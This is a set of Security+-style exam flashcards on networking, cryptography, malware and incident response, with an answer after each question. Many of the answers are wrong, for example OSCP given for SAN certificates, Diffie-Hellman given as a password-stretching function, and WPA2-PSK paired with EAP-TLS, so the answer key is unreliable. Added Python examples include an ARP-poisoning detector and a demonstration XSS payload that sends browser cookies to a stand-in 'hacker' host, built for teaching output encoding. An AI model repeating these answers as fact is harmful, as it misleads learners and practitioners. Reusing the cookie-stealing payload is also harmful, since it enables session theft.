Topic 5 Flashcards
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use?
Shredding
Wiping
Low-level formatting
Repartitioning
Overwriting
Shredding
An organization’s employees currently use three different sets of credentials to access multiple internal
resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?
Transitive trust
Single sign-on
Federation
Secure token
Single sign-on
Students at a residence hall are reporting Internet connectivity issues. The university’s network administrator configured the residence hall’s network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall’s network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?
Router ACLs
BPDU guard
Flood guard
DHCP snooping
DHCP snooping
Which of the following is a major difference between XSS attacks and remote code exploits?
XSS attacks use machine language, while remote exploits use interpreted language
XSS attacks target servers, while remote code exploits target clients
Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only
Remote code exploits allow writing code at the client side and executing it, while XSS attacks require
no code to work
XSS attacks use machine language, while remote exploits use interpreted language
An attachment that was emailed to finance employees contained an embedded message. The security
administrator investigates and finds the intent was to conceal the embedded information from public view.
Which of the following BEST describes this type of message?
Obfuscation
Steganography
Diffusion
BCRYPT
Obfuscation
Which of the following locations contain the MOST volatile data?
SSD
Paging file
RAM
Cache memory
Cache memory
An incident response analyst at a large corporation is reviewing proxy data log. The analyst believes a
malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO).
Which of the following is the best NEXT step for the analyst to take?
Call the CEO directly to ensure awareness of the event
Run a malware scan on the CEO’s workstation
Reimage the CEO’s workstation
Disconnect the CEO’s workstation from the network
Disconnect the CEO’s workstation from the network
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?
Nonce
Salt
OTP
Block cipher
IV
Salt
A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following
types of malware would generate such a file?
Keylogger
Rootkit
Bot
RAT
Keylogger
A company utilizes 802.11 for all client connectivity within a facility. Users in one part of the building are
reporting they are unable to access company resources when connected to the company SSID.
Which of the following should the security administrator use to assess connectivity?
Sniffer
Honeypot
Routing tables
Wireless scanner
Routing tables
An analyst generates the color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis indicates the impact.
Which of the following is this table an example of?
Internal threat assessment
Privacy impact assessment
Qualitative risk assessment
Supply chain assessment
Qualitative risk assessment
Legal authorities notify a company that its network has been compromised for the second time in two years.
The investigation shows the attackers were able to use the same vulnerability on different systems in both
attacks. Which of the following would have allowed the security team to use historical information to protect
against the second attack?
Key risk indicators
Lessons learned
Recovery point objectives
Tabletop exercise
Lessons learned
An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?
Use a protocol analyzer to reconstruct the data and implement a web-proxy.
Deploy a web-proxy and then blacklist the IP on the firewall.
Deploy a web-proxy and implement IPS at the network edge.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.
A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor.
Which of the following BEST describes this forensic concept?
Legal hold
Chain of custody
Order of volatility
Data acquisition
Legal hold
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a
requirement for this configuration?
Setting up a TACACS+ server
Configuring federation between authentication servers
Enabling TOTP
Deploying certificates to endpoint devices
Deploying certificates to endpoint devices
Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources?
RADIUS
SSH
OAuth
MSCHAP
OAuth
Which of the following is an example of resource exhaustion?
A penetration tester requests every available IP address from a DHCP server.
An SQL injection attack returns confidential data back to the browser.
Server CPU utilization peaks at 100% during the reboot process.
System requirements for a new software package recommend having 12GB of RAM, but only BGB are available.
A penetration tester requests every available IP address from a DHCP server
A company recently updated its website to increase sales. The new website uses PHP forms for leads and
provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern:
Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above?
Changing the account standard naming convention
Implementing account lockouts
Discontinuing the use of privileged accounts
Increasing the minimum password length from eight to ten characters
Changing the account standard naming convention
An organization’s Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS
on the CEO’s personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result.
Which of the following would address this violation going forward?
Security configuration baseline
Separation of duties
AUP
NDA
AUP (acceptable use policy)
A security administrator is implementing a secure method that allows developers to place files or objects onto a Linux server. Developers are required to log in using a username, password, and asymmetric key. Which of the following protocols should be implemented?
ssl/tls
sftp
srtp
ipsec
SFTP
A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?
Implementing a site-to-site VPN for server access.
Implementing a DMZ segment for the server.
Implementing NAT addressing for the servers.
Implementing a sandbox to contain the servers.
Implementing a DMZ segment for the server
A Chief Information Officer (CIO) asks the company’s security specialist if the company should spend any
funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?
$500
$1000
$2000
$2500
$500
A security auditor is reviewing the following output from file integrity monitoring software installed on a very busy server at a large service provider. The server has not been updated since it was installed. Drag and drop the log entry that identifies the first instance of server compromise.
1/1/2017 3:30:00
Which of the following control types would a backup of server data provide in case of a system issue?
Corrective
Deterrent
Preventive
Detective
Corrective
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?
Domain hijacking
Injection
Buffer overflow
Privilege escalation
Privilege escalation
A security administrator suspects that a DDoS attack is affecting the DNS server. The administrator accesses a
workstation with the hostname of workstation01 on the network and obtains the following output from the
ipconfig command:
The administrator successfully pings the DNS server from the workstation. Which of the following commands
should be issued from the workstation to verify the DDoS attack is no longer occurring?
dig www.google.com
dig 192.168.1.254
dig workstation01.com
dig 192.168.1.26
dig workstation01.com
After reports of slow internet connectivity, a technician reviews the following logs from a server’s host-based
firewall:
Which of the following can the technician conclude after reviewing the above logs?
The server is under a DDoS attack from multiple geographic locations.
The server is compromised, and is attacking multiple hosts on the Internet.
The server is under an IP spoofing resource exhaustion attack.
The server is unable to complete the TCP three-way handshake and send the last ACK.
The server is under an IP spoofing resource exhaustion attack.
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized.
Which of the following solutions would BEST meet these requirements?
Multifactor authentication
SSO
Biometrics
PKI
Federation
SSO
An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?
Faraday cage
Air gap
Mantrap
Bollards
Mantrap
A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system
logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the
C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look
suspicious.
One of the files contains the following commands:
Which of the following types of malware was used?
Worm
Spyware
Logic bomb
Backdoor
Backdoor
A recent penetration test revealed several issues with a public-facing website used by customers. The testers were able to:
- Enter long lines of code and special characters
- Crash the system
- Gain unauthorized access to the internal application server
- Map the internal network
The development team has stated they will need to rewrite a significant portion of the code used, and it will take more than a year to deliver the finished product. Which of the following would be the BEST solution to introduce in the interim?
Content filtering
WAF
TLS
IPS/IDS
UTM
UTM (unified threat management)
Which of the following scenarios BEST describes an implementation of non-repudiation?
A user logs into a domain workstation and accesses network file shares for another department
A user remotely logs into the mail server with another user’s credentials
A user sends a digitally signed email to the entire finance department about an upcoming meeting
A user accesses the workstation registry to make unauthorized changes to enable functionality within an application
A user sends a digitally signed email to the entire finance department about an upcoming meeting.
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take to maintain the chain of custody?
Make a forensic copy
Create a hash of the hard drive
Recover the hard drive data
Update the evidence log
Update the evidence log
As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the Internet in a secure manner. Which of the following protocols would BEST meet this objective? (Choose two.)
LDAPS
SFTP
HTTPS
DNSSEC
SRTP
SFTP
HTTPS
A security specialist is notified about a certificate warning that users receive when using a new internal
website. After being given the URL from one of the users and seeing the warning, the security specialist
inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site.
Which of the following would BEST resolve the issue?
OSCP
OID
PEM
SAN
OSCP (Offensive Security Certified Professional)
A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against
intranet services. The scan reports include the following critical-rated vulnerability:
Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0)
Threat actor: any remote user of the web server
Confidence: certain
Recommendation: apply vendor patches
Which of the following actions should the security analyst perform FIRST?
Escalate the issue to senior management.
Apply organizational context to the risk rating.
Organize for urgent out-of-cycle patching.
Exploit the server to check whether it is a false positive.
Apply organizational context to the risk rating
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users.
Which of the following BEST represents the required cloud deployment model?
SaaS
IaaS
MaaS
Hybrid
Private
SaaS (Security-as-a-service)
An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN. As part of discussions on the topic, several solutions are proposed. Which of the following controls, when required together, will address the protection of data at rest as well as strong authentication? (Select TWO.)
Containerization
FDE
Remote wipe capability
MDM
MFA
OTA updates
Containerization
and
FDE (full disk encryption)
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the
requirement, which of the following should the security analyst do to MINIMIZE the risk?
Enable CHAP
Disable NTLM
Enable Kerberos
Disable PAP
Disable NTLM (New Technology LAN Manager)
A network administrator is brute forcing accounts through a web interface. Which of the following would
provide the BEST defense from an account password being discovered?
Password history
Account lockout
Account expiration
Password complexity
Account lockout
A security analyst is assessing a small company’s internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Choose two.)
Compare configurations against platform benchmarks
Confirm adherence to the company’s industry-specific regulations
Review the company’s current security baseline
Verify alignment with policy related to regulatory compliance
Run an exploitation framework to confirm vulnerabilities
Review the company’s current security baseline
and
Run an exploitation framework to confirm vulnerabilities
A security administrator is performing a risk assessment on a legacy WAP with a WEP-enabled wireless infrastructure. Which of the following should be implemented to harden the infrastructure without upgrading the WAP?
Implement WPA and TKIP
Implement WPS and an eight-digit pin
Implement WEP and RC4
Implement WPA2 Enterprise
Implement WPA2 Enterprise
An organization is looking to build its second head office in another city, which has a history of flooding, with an average of two floods every 100 years. The estimated building cost is $1 million, and the estimated damage due to flooding is half of the building's cost. Given this information, which of the following is the SLE?
$50,000
$250,000
$500,000
$1,000,000
$500,000
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message
indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the
organization lose the ability to open files on the server.
Which of the following has MOST likely occurred? (Choose three.)
Crypto-malware
Adware
Botnet attack
Virus
Ransomware
Backdoor
DDoS attack
Crypto-malware
Virus
Ransomware
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?
Accounting
Authorization
Authentication
Identification
Accounting
Which of the following components of printers and MFDs are MOST likely to be used as vectors of
compromise if they are improperly configured?
Embedded web server
Spooler
Network interface
LCD control panel
Embedded web server
Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet?
Design weakness
Zero-day
Logic bomb
Trojan
Zero-day
Which of the following BEST explains why a development environment should have the same database server secure baseline that exists in production, even if there is no PII in the database?
Without the same configuration in both development and production, there is no assurance that changes made in development will have the same effect in production.
Attackers can extract sensitive, personal information from lower development environment databases just as easily as they can from production databases.
Databases are unique in their need to have secure configurations applied in all environments because they are attacked more often.
Laws stipulate that databases with the ability to store personal information must be secured regardless of the environment or whether they actually have PII.
Laws stipulate that databases with the ability to store personal information must be secured regardless of the environment or whether they actually have PII
A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)
TOTP
SCP
FTP over a non-standard port
SRTP
Certificate-based authentication
SNMPv3
FTP over a non-standard port
and
Certificate-based authentication
Which of the following would provide additional security by adding another factor to a smart card?
Token
Proximity badge
Physical key
PIN
PIN
A company wants to implement a wireless network with the following requirements:
All wireless users will have a unique credential.
User certificates will not be required for authentication.
The company’s AAA infrastructure must be utilized.
Local hosts should not store authentication tokens.
Which of the following should be used in the design to meet the requirements?
EAP-TLS
WPS
PSK
PEAP
PEAP (protected extensible authentication protocol)
A security analyst identified an SQL injection attack.
Which of the following is the FIRST step in remediating the vulnerability?
Implement stored procedures.
Implement proper error handling.
Implement input validations.
Implement a WAF.
Implement input validations
A security administrator wants to implement least privilege access for a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implementing discretionary access control. The following controls are available:
Read = A user can read the content of an existing file. Write = A user can modify the content of an existing file and delete an existing file. Create = A user can create a new file and place data within the file.
A missing control means the user does not have that access. Which of the following configurations provides the appropriate control to support the organization's requirements?
A. Owners: Read, Write, Create; Group Members: Read, Write; Others: Read, Create
B. Owners: Read, Create; Group Members: Read, Write, Create; Others: Read
C. Owners: Read, Write; Group Members: Read, Create; Others: Read, Create
D. Owners: Write, Create; Group Members: Read, Create; Others: Read, Write, Create
A. Owners: Read, Write, Create
Group Members: Read, Write
Others: Read, Create
A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of a popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user?
Insider
Script kiddie
Competitor
Hacktivist
APT
Script kiddie
After a security assessment was performed on the enterprise network, it was discovered that:
Configuration changes have been made by users without the consent of IT.
Network congestion has increased due to the use of social media.
Users are accessing file folders and network shares that are beyond the scope of their need to know.
Which of the following BEST describe the vulnerabilities that exist in this environment? (Choose two.)
Poorly trained users
Misconfigured WAP settings
Undocumented assets
Improperly configured accounts
Vulnerable business processes
Poorly trained users
and
Improperly configured accounts
A company recently experienced data exfiltration via the corporate network. In response to the breach, a
security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be
implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS?
Network tap
Network proxy
Honeypot
Port mirroring
Port mirroring
An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and
identity proofing. The goal of the account management policy is to ensure the highest level of security while
providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners?
Guest account
User account
Shared account
Privileged user account
Default account
Service account
Privileged user account
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST
solutions for the organization? (Select TWO)
TACACS+
CHAP
LDAP
RADIUS
MSCHAPv2
TACACS+
and
RADIUS
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann’s access and checks the SIEM for any errors. The security analyst reviews the log file from Ann’s system and notices the following output:
Which of the following is MOST likely preventing Ann from accessing the application from the desktop?
Web application firewall
DLP
Host-based firewall
UTM
Network-based firewall
Host-based firewall
A security administrator is analyzing a user report in which the computer exhibits odd network-related
outages. The administrator, however, does not see any suspicious process running. A prior technician’s notes
indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently.
Which of the following is the MOST likely cause of this behavior?
Crypto-malware
Rootkit
Logic bomb
Session hijacking
Rootkit
A security engineer must install the same x.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use?
Wildcard certificate
Extended validation certificate
Certificate chaining
Certificate utilizing the SAN file
Certificate utilizing the SAN (subject alternate names) file
An office recently completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include:
Intellectual property
Payroll records
Financial information
Drug screening results
Which of the following is the BEST way to dispose of these items?
Shredding
Pulping
Deidentifying
Recycling
Pulping
A security analyst is hardening a large-scale wireless network. The primary requirements are the following:
Must use authentication through EAP-TLS certificates
Must use an AAA server
Must use the most secure encryption protocol
Given these requirements, which of the following should the analyst implement and recommend? (Select TWO.)
802.1X
802.3
LDAP
TKIP
CCMP
WPA2-PSK
802.1X
and
WPA2-PSK
A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and
moving all heavy applications and storage to a centralized server that hosts all of the company’s required desktop applications. Which of the following describes the BEST deployment method to meet these
requirements?
IaaS
VM sprawl
VDI
PaaS
VDI
Ann, a customer, is reporting that several important files are missing from her workstation. She recently
received communication from an unknown party who is requesting funds to restore the files. Which of the
following attacks has occurred?
Ransomware
Keylogger
Buffer overflow
Rootkit
Ransomware
Which of the following needs to be performed during a forensics investigation to ensure the data contained in
a drive image has not been compromised?
Follow the proper chain of custody procedures.
Compare the image hash to the original hash.
Ensure a legal hold has been placed on the image.
Verify the time offset on the image file.
Compare the image hash to the original hash
An administrator is implementing a secure web server and wants to ensure that if the web server application is compromised, the application does not have access to other parts of the server or network. Which of the
following should the administrator implement? (Choose two.)
Mandatory access control
Discretionary access control
Rule-based access control
Role-based access control
Attribute-based access control
Mandatory access control
and
Rule-based access control
Users are attempting to access a company's website but are transparently redirected to another website. The users confirm the URL is correct. Which of the following would BEST prevent this issue in the future?
DNSSEC
HTTPS
IPSec
TLS/SSL
DNSSEC
A network technician is setting up a new branch for a company. The users at the new branch will need to
access resources securely as if they were at the main location. Which of the following networking concepts
would BEST accomplish this?
Virtual network segmentation
Physical network segmentation
Site-to-site VPN
Out-of-band access
Logical VLANs
Site-to-site VPN
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?
The password expired on the account and needed to be reset
The employee does not have the rights needed to access the database remotely
Time-of-day restrictions prevented the account from logging in
The employee’s account was locked out and needed to be unlocked
Time-of-day restrictions prevented the account from logging in
A customer calls a technician and needs to remotely connect to a web server to change some code manually. The technician needs to configure the user’s machine with protocols to connect to the Unix web server, which is behind a firewall. Which of the following protocols does the technician MOST likely need to configure?
SSH
SFTP
HTTPS
SNMP
SSH
Which of the following are used to substantially increase the computation time required to crack a password? (Choose two.)
BCRYPT
Substitution cipher
ECDHE
PBKDF2
Diffie-Hellman
BCRYPT
and
Diffie-Hellman
An organization wants to ensure network access is granted only after a user or device has been authenticated.
Which of the following should be used to achieve this objective for both wired and wireless networks?
CCMP
PKCS#12
IEEE 802.1X
OCSP
IEEE 802.1x
Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet?
Design weakness
Zero-day
Logic bomb
Trojan
Zero-day
A small company’s Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the
company’s security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST?
Survey threat feeds from services inside the same industry.
Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic
Conduct an internal audit against industry best practices to perform a qualitative analysis.
Deploy a UTM solution that receives frequent updates from a trusted industry vendor.
Survey threat feeds from services inside the same industry
A company has purchased a new SaaS application and is in the process of configuring it to meet the
company’s needs. The director of security has requested that the SaaS application be integrated into the company’s IAM processes. Which of the following configurations should the security administrator set up in order to complete this request?
LDAP
RADIUS
SAML
NTLM
RADIUS
A security administrator is developing a methodology for tracking staff access to patient data. Which of
the following would be the BEST method of creating audit trails for usage reports?
Deploy file integrity checking
Restrict access to the database by following the principle of least privilege
Implementing a database activity monitoring system
Created automated alerts on the IDS system for the database server
Implementing a database activity monitoring system
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computing resources. Which of the following vulnerabilities exists?
Buffer overflow
End-of-life systems
System sprawl
Weak configuration
System sprawl
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the
antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?
RAT
Worm
Ransomware
Bot
RAT
A security administrator wants to determine if a company’s web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?
Non-credentialed
Passive
Port
Credentialed
Red team
Active
Credentialed
A company has won an important government contract. Several employees have been transferred from their existing projects to support a new contract. Some of the employees who have transferred will be working long hours and still need access to their project information to transition work to their replacements.
Which of the following should be implemented to validate that the appropriate offboarding process has been followed?
Separation of duties
Time-of-day restrictions
Permission auditing
Mandatory access control
Permission auditing
A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer?
Round-robin
Weighted
Least connection
Locality-based
Locality-based
Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack.
Which of the following is considered to be a corrective action to combat this vulnerability?
Install an antivirus definition patch
Educate the workstation users
Leverage server isolation
Install a vendor-supplied patch
Install an intrusion detection system
Install a vendor-supplied patch
A security administrator is investigating many recent incidents of credential theft for users accessing the
company’s website, despite the hosting web server requiring HTTPS for access. The server’s logs show the
website leverages the HTTP POST method for carrying user authentication details.
Which of the following is the MOST likely reason for compromise?
The HTTP POST method is not protected by HTTPS.
The web server is running a vulnerable SSL configuration.
The company does not support DNSSEC.
The HTTP response is susceptible to sniffing.
The web server is running a vulnerable SSL configuration
Which of the following enables sniffing attacks against a switched network?
ARP poisoning
IGMP snooping
IP spoofing
SYN flooding
ARP poisoning
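An added example (not part of the original flashcard set) showing the detection side of this card: a poisoner wins sniffing on a switched network by answering ARP so that the gateway's IP maps to the attacker's MAC. The two signals worth alerting on are an IP whose MAC changes and one MAC that claims several IPs at once. The ARP replies below are constructed sample data; the IPs and MACs are illustrative.

```python
from collections import defaultdict

# Constructed sample of ARP replies as (timestamp, sender IP, sender MAC).
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # legitimate gateway
    (2.0, "192.168.1.20", "aa:bb:cc:00:00:20"),  # legitimate host
    (3.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # gateway again, unchanged: no alert
    (4.0, "192.168.1.1", "de:ad:be:ef:00:99"),   # attacker now claims the gateway IP
    (5.0, "192.168.1.20", "de:ad:be:ef:00:99"),  # ...and the host IP: full MITM position
]


def detect_arp_poisoning(replies):
    """Return alerts for IP->MAC remaps and for a single MAC claiming several IPs."""
    ip_to_mac = {}                  # last MAC seen for each IP
    mac_to_ips = defaultdict(set)   # every IP each MAC has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"ts": ts, "type": "ip-remapped", "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append({"ts": ts, "type": "mac-claims-multiple-ips", "mac": mac,
                           "ips": sorted(mac_to_ips[mac])})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```

On a real segment, first-hop redundancy (VRRP/HSRP failover) and DHCP churn cause legitimate remaps, so a production rule needs an allowlist of gateway MACs and a time window; the switch-side control is dynamic ARP inspection fed by DHCP snooping bindings.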
An attacker exploited a vulnerability on a mail server using the code below.
onload=document.location.replace('http://hacker/post.asp?victim?message='
Which of the following BEST explains what the attacker is doing?
The attacker is replacing a cookie.
The attacker is stealing a document.
The attacker is replacing a document.
The attacker is deleting a cookie.
The attacker is replacing a document
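An added example (not part of the original flashcard set) of why a handler like the one above ends up in a victim's page at all: the application reflects untrusted input into HTML without output encoding. The payload below is constructed in the same style as the quoted snippet and is not the page's own code; `render_unsafe` is the vulnerable pattern, `render_safe` the hardened one, and `has_script_injection` a simple check you can run over rendered output.

```python
import html
import re

# Constructed payload in the style of the quoted onload handler (not the page's snippet):
# an event handler that ships the victim's cookies to an attacker-controlled host.
XSS_PAYLOAD = (
    "<img src=x onerror=\"document.location.replace("
    "'http://hacker/post.asp?message=' + document.cookie)\">"
)

PAGE_TEMPLATE = "<html><body><h1>Hello, {name}</h1></body></html>"


def render_unsafe(name):
    # Vulnerable: attacker-controlled text is concatenated straight into the HTML body.
    return PAGE_TEMPLATE.format(name=name)


def render_safe(name):
    # Hardened: HTML-escape untrusted text so '<', '>', '&' and both quote characters
    # cannot leave the text context and start a tag or attribute.
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True))


# Any tag carrying an on* attribute (onload, onerror, onclick, ...) in the rendered page.
EVENT_HANDLER_RE = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def has_script_injection(rendered_html):
    """Detection check for rendered output: True if an inline event handler is present."""
    return bool(EVENT_HANDLER_RE.search(rendered_html))


if __name__ == "__main__":
    print("unsafe:", has_script_injection(render_unsafe(XSS_PAYLOAD)))  # True
    print("safe:  ", has_script_injection(render_safe(XSS_PAYLOAD)))    # False
```

Escaping must match the context (HTML body here; attribute, URL and JavaScript contexts need their own encoders), and marking session cookies `HttpOnly` removes `document.cookie` from what such a handler can exfiltrate even when an injection slips through.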
An organization wants to implement a method to correct risks at the system/application layer. Which of the following is the BEST method to accomplish this goal?
IDS/IPS
IP tunneling
Web application firewall
Patch management
Patch management
An application developer has neglected to include input validation checks in the design of the company’s new web application. An employee discovers that repeatedly submitting large amounts of data, including custom code, to an application will allow the execution of the custom code at the administrator level. Which of the following BEST identifies this application attack?
Cross-site scripting
Clickjacking
Buffer overflow
Replay
Buffer overflow
Which of the following types of security testing is the MOST cost-effective approach used to analyze existing
code and identify areas that require patching?
Black box
Gray box
White box
Red team
White box
A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company’s revenue, referrals, and reputation.
Which of the following is an element of the BIA that this action is addressing?
Identification of critical systems
Single point of failure
Value assessment
Risk register
Identification of critical systems
A group of developers is collaborating to write software for a company. The developers need to work in subgroups and control who has access to their modules. Which of the following access control methods is considered user-centric?
Time-based
Mandatory
Rule-based
Discretionary
Discretionary
An organization has several production-critical SCADA supervisory systems that cannot follow the normal
30-day patching policy. Which of the following BEST maximizes the protection of these systems from
malicious software?
Configure a firewall with deep packet inspection that restricts traffic to the systems.
Configure a separate zone for the systems and restrict access to known ports.
Configure the systems to ensure only necessary applications are able to run.
Configure the host firewall to ensure only the necessary applications have listening ports
Configure a firewall with deep packet inspection that restricts traffic to the systems.
Which of the following is an asymmetric function that generates a new and separate key every time it runs?
RSA
DSA
DHE
HMAC
PBKDF2
DHE (Ephemeral Diffie-Hellman)
Which of the following authentication concepts is a gait analysis MOST closely associated?
Somewhere you are
Something you are
Something you do
Something you know
Something you do
Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?
Sandboxing
Encryption
Code signing
Fuzzing
Sandboxing
A systems administrator has isolated an infected system from the network and terminated the malicious
process from executing. Which of the following should the administrator do NEXT according to the incident
response process?
Restore lost data from a backup.
Wipe the system.
Document the lessons learned.
Determine the scope of impact.
Restore lost data from a backup
A systems administrator needs to integrate multiple IoT and small embedded devices into the company’s
wireless network securely. Which of the following should the administrator implement to ensure low-power and legacy devices can connect to the wireless network?
WPS
WPA
EAP-FAST
802.1X
WPS (Wi-Fi Protected Setup)
Which of the following BEST describes the purpose of authorization?
Authorization provides logging to a resource and comes after authentication.
Authorization provides authentication to a resource and comes after identification.
Authorization provides identification to a resource and comes after authentication.
Authorization provides permissions to a resource and comes after authentication.
Authorization provides permissions to a resource and comes after authentication.
A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists with a
specific version of a technology the company uses to support many critical applications. The CIO wants to
know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?
Penetration test
Vulnerability scan
Active reconnaissance
Patching assessment report
Penetration test
Joe, a user, reports to the help desk that he can no longer access any documents on his PC. He states that he saw a window appear on the screen earlier, but he closed it without reading it. Upon investigation, the
technician sees high disk activity on Joe’s PC. Which of the following types of malware is MOST likely
indicated by these findings?
Keylogger
Trojan
Rootkit
Crypto-malware
Crypto-malware
A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The
user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?
The certificate has expired
The browser does not support SSL
The user’s account is locked out
The VPN software has reached the seat license maximum
The certificate has expired
Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices
on their home networks?
Power off the devices when they are not in use.
Prevent IoT devices from contacting the Internet directly.
Apply firmware and software updates upon availability.
Deploy a bastion host on the home network.
Apply firmware and software updates upon availability
A security consultant is setting up a new electronic messaging platform and wants to ensure the platform
supports message integrity validation.
Which of the following protocols should the consultant recommend?
S/MIME
DNSSEC
RADIUS
802.11x
S/MIME
A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?
Physical
Corrective
Technical
Administrative
Administrative
A call center company wants to implement a domain policy primarily for its shift workers. The call center has
large groups with different user roles. Management wants to monitor group performance. Which of the
following is the BEST solution for the company to implement?
Reduced failed logon attempts
Mandatory password changes
Increased account lockout time
Time-of-day restrictions
Time-of-day restrictions
A company has migrated to two-factor authentication for accessing the corporate network, VPN, and SSO.
Several legacy applications cannot support multifactor authentication and must continue to use usernames and passwords. Which of the following should be implemented to ensure the legacy applications are as secure as possible while ensuring functionality? (Choose two.)
Privileged accounts
Password reuse restrictions
Password complexity requirements
Password recovery
Account disablement
Password complexity requirements
and
Account disablement
After discovering the /etc/shadow file had been rewritten, a security administrator noticed an application insecurely creating files in / tmp.
Which of the following vulnerabilities has MOST likely been exploited?
Privilege escalation
Resource exhaustion
Memory leak
Pointer dereference
